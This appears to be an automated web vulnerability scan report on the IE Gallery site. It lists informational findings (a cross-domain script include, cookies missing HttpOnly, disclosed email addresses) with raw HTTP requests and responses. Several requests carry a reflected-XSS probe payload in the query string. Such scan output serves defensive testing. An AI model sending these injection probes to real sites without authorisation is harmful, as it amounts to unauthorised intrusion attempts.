<span class="logo_azure" id="logo_azure"><a href="http://www.microsoft.com/windowsazure/" target="_blank"><img src="/assets/images/layout/logo_azure.png" />
...[SNIP]...
</span>
           <a href="http://www.microsoft.com"><img src="/assets/images/layout/logo_microsoft.png" alt="Microsoft" class="logo_microsoft" />
...[SNIP]...

4. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/addons/detail.aspx

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /us/addons/detail.aspx?id=790 HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3599
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:02 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:02 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:03 GMT
Connection: close
Content-Length: 35432


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 8 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.iegallery.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=1 HTTP/1.1
Host: www.iegallery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: viewedLearnMorePinned=true; viewedLearnMorePinned=true

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:19 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:19 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=j35j4vpapih1cadkelqyoasu; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=f6940200-bddf-4746-a578-29a29f08aa74; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:19 GMT
Content-Length: 42528


<!DOCTYPE html>


<html lang="en" data-rootlocation="en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   xm
...[SNIP]...

5.2. http://www.iegallery.com/en/pinnedsites/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/pinnedsites/detail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/pinnedsites/detail.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /pinnedsites/Default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=lxm5xhcpjmzcgbc2iudd2u0z; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=1db38305-8b03-4447-9b55-adc11b72e4d2; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:40:59 GMT
Connection: close
Content-Length: 142

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/pinnedsites/Default.aspx">here</a>.</h2>
</body></html>

5.3. http://www.iegallery.com/en/signout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/signout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/signout.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://internetexplorergallery.accesscontrol.windows.net/v2/wsfederation?wa=wsignout1.0&wreply=http%3a%2f%2fwww.iegallery.com%2f
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=mvzwjcd3vd1vi2fvmo5viehn; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=6bfd54e1-b773-4341-a513-e4e28215eb6b; path=/
Set-Cookie: .ASPXAUTH=; expires=Tue, 12-Oct-1999 00:00:00 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:01 GMT
Connection: close
Content-Length: 250

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://internetexplorergallery.accesscontrol.windows.net/v2/wsfederation?wa=wsignout1.0&amp;wreply=http%3a%2f%2fwww.
...[SNIP]...

5.4. http://www.iegallery.com/us/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/Register.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/Register.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en/addons/default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5pjevr5vraikmoh4yfbou3oo; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=d52812cb-e6e5-4f28-b2c4-4f490ae8641d; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:03 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

5.5. http://www.iegallery.com/us/addons/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/addons/detail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/addons/detail.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:03 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:03 GMT
Location: /addons/Default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=efdfpn4byxr1z4cshtypgirp; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=21773cba-f614-422d-b920-dca10c8cd792; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:03 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/addons/Default.aspx">here</a>.</h2>
</body></html>

5.6. http://www.iegallery.com/us/pinnedsites/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/pinnedsites/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/pinnedsites/default.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:02 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:02 GMT
Location: /en/addons/default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vn5bkezwfbeqvzmdhfrwkkkp; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=4101874c-7951-4e4a-b6cb-90bfd05b30b5; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:02 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

5.7. http://www.iegallery.com/us/pinnedsites/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/pinnedsites/detail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/pinnedsites/detail.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /pinnedsites/Default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pzuockv5klwi45k5knsxnf2w; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=0b6eb1de-7aba-4789-a99e-34f95d5dd01d; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:02 GMT
Connection: close
Content-Length: 142

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/pinnedsites/Default.aspx">here</a>.</h2>
</body></html>

5.8. http://www.iegallery.com/us/trackingprotectionlists/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/trackingprotectionlists/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/trackingprotectionlists/default.aspx HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:04 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:04 GMT
Location: /en/addons/default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qw2w03xnj54emyrqdcrpoqtz; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=a12379d1-7ada-4eca-bbd3-6ef867108c4c; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:03 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

6. Email addresses disclosed  previous
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://www.iegallery.com/en/assets/js/holiday.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/assets/js/holiday.js

Issue detail

The following email address was disclosed in the response:

Request

GET /en/assets/js/holiday.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.iegallery.com/en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.iegallery.com
Cookie: ASP.NET_SessionId=ynbopximcbbiy2bp1njvsudw; ie8_webslice_anonymous=3325a3bc-90e2-472e-9b40-a650ee2d56b1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Dec 2011 20:31:16 GMT
Accept-Ranges: bytes
ETag: "22c6a75731b1cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:01 GMT
Content-Length: 7971

...


// jSnow, a jQuery Plugin v1.2
// Licensed under GPL licenses.
// Copyright (C) 2009 Nikos "DuMmWiaM" Kontis, dummwiam@gmail.com
// http://www.DuMmWiaM.com/jSnow
(function ($) {
   $.fn.jSnow = function (h) {
       var j = $.extend({}, $.fn.jSnow.defaults, h);
       var _width = this.width();
       var _height = this.height();
       var l
...[SNIP]...

6.2. http://www.iegallery.com/en/assets/js/s_code.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/assets/js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /en/assets/js/s_code.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.iegallery.com/en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.iegallery.com
Cookie: ASP.NET_SessionId=ynbopximcbbiy2bp1njvsudw; ie8_webslice_anonymous=3325a3bc-90e2-472e-9b40-a650ee2d56b1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Nov 2011 21:10:30 GMT
Accept-Ranges: bytes
ETag: "5ca4ac7da4afcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:02 GMT
Content-Length: 31606

...


...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

Report generated by XSS.CX at Sun Dec 04 08:41:00 CST 2011.